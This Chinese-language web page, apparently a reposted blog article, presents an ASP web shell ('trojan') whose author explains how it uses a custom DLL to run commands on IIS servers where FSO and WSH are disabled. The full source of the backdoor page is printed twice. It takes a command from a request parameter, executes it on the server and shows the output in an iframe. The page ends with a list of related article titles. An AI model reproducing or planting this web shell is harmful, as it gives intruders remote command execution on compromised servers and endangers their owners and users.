一个不用FSO和WSH支持的ASP木马
来源:互联网 发布:周琦身体数据 编辑:程序博客网 时间:2024/05/21 17:34
界面很简单,差不多类似古老的cmd.asp.只是做抛砖引玉的东西
写好后~自己看了都高兴~~西西~用的是VB的SHELL函数!
其实这个东西唯一的好处就是在有的机器上禁止了FSO和WSH之后也能够运行。
原理是先产生一个DLL对象,然后用ASP去调用这个对象中的EXEC函数,这样就可以得到命令了。然后执行输出到网页所在的目录下的ZZ.TXT中,页面中用IFRAME读取~~但是需要手动刷新一下,毕竟SHELL执行是异步的。。。。
PS:kevinz.dll需要和SHELL.ASP放在一起才能使用或者将SHELL.ASP放到SYSTEM32目录下
代码如下:
<%
dim shell
set shell=server.createobject("kevinz.exec")
path=server.mappath(".")
response.write "<font color=blue size=2>Now system Path is:<br><br>"&path&"<br></font><hr color=red>"
if not request("cmd")="" then
cmd=request("cmd")
cmd=replace(cmd,"^","^^")
cmd=replace(cmd,">","^>")
cmd=replace(cmd,"<","^<")
cmd=replace(cmd,"&","^&")
shell.exec cmd,path
response.write "<br><font color=red size=2>Command:"""&cmd&"""<br>Command successfully executed<br></font>"
else
cmd="ver"
end if
set test=nothing
%>
<html>
<head><title>Kevin1986's she11 aspd00r</title>
</head>
<form name="kevinz" action="shell.asp">
<input type="text" name="cmd" value=<%=cmd%> size=60>
<input type="submit" value="eXe(u+e (0mm4nd">
<br>
<iframe height=60% width=80% src="zz.txt" name="result"></iframe><br>
<font size=2><a href=javascript:history.go(0) target="result">查看执行结果</a></font>
</body>
</html>
写好后~自己看了都高兴~~西西~用的是VB的SHELL函数!
其实这个东西唯一的好处就是在有的机器上禁止了FSO和WSH之后也能够运行。
原理是先产生一个DLL对象,然后用ASP去调用这个对象中的EXEC函数,这样就可以得到命令了。然后执行输出到网页所在的目录下的ZZ.TXT中,页面中用IFRAME读取~~但是需要手动刷新一下,毕竟SHELL执行是异步的。。。。
PS:kevinz.dll需要和SHELL.ASP放在一起才能使用或者将SHELL.ASP放到SYSTEM32目录下
代码如下:
<%
dim shell
set shell=server.createobject("kevinz.exec")
path=server.mappath(".")
response.write "<font color=blue size=2>Now system Path is:<br><br>"&path&"<br></font><hr color=red>"
if not request("cmd")="" then
cmd=request("cmd")
cmd=replace(cmd,"^","^^")
cmd=replace(cmd,">","^>")
cmd=replace(cmd,"<","^<")
cmd=replace(cmd,"&","^&")
shell.exec cmd,path
response.write "<br><font color=red size=2>Command:"""&cmd&"""<br>Command successfully executed<br></font>"
else
cmd="ver"
end if
set test=nothing
%>
<html>
<head><title>Kevin1986's she11 aspd00r</title>
</head>
<form name="kevinz" action="shell.asp">
<input type="text" name="cmd" value=<%=cmd%> size=60>
<input type="submit" value="eXe(u+e (0mm4nd">
<br>
<iframe height=60% width=80% src="zz.txt" name="result"></iframe><br>
<font size=2><a href=javascript:history.go(0) target="result">查看执行结果</a></font>
</body>
</html>
- 一个不用FSO和WSH支持的ASP木马
- 不用模板只用ASP+FSO生成静态HTML页的一个方法
- 不用模板,只用ASP+FSO生成静态HTML页的一个方法
- 一个基于Jscript和fso的asp模板机制
- 利用FSO做的ASP木马检索工具
- 不用模板,只用ASP+FSO生成静态HTML页的一个方法(对于内容密集型页面特别适用)
- 不用模板,只用ASP+FSO生成静态HTML页的一个方法(对于内容密集型页面特别适用)
- 服务器FSO设置教程!防ASP木马
- 不用模板,只用ASP+FSO生成静态HTML页的一个方法(对于内容密集型页面特别适用) 选择自 goaler 的 Blog
- 不用模板,只用ASP+FSO生成静态HTML页的一个方法(对于内容密集型页面特别适用) 选择自 goaler 的 Blog
- iis支持FSO的设置
- 一个ASP木马
- ASP中FSO组件的属性和方法(一)-
- ASP中FSO组件的属性和方法(二)-
- ASP中FSO组件的属性和方法(三)-
- ASP中FSO组件的属性和方法(四)-
- ASP中FSO组件的属性和方法(五)-
- ASP中FSO组件的属性和方法(六)-
- 被我抛弃的古典情缘
- PHP网站漏洞的相关总结
- 。INF文件格式说明
- 中港台譯名對照表簡易語法版
- Google和Blog,两种文化正在改变我们的生活
- 一个不用FSO和WSH支持的ASP木马
- CGI安全漏洞资料速查表
- 信息安全的隐患-GoogleHacking原理和防范
- 用JBuilder2005开发spring MVC应用-显示PDF/Excel文档
- black hat2003年黑客大会的精彩入侵课程
- QQ对话设置
- Christmas day for 2004
- J2EE 探险者:持久数据管理,第 1 部分
- Linux的mount命令简介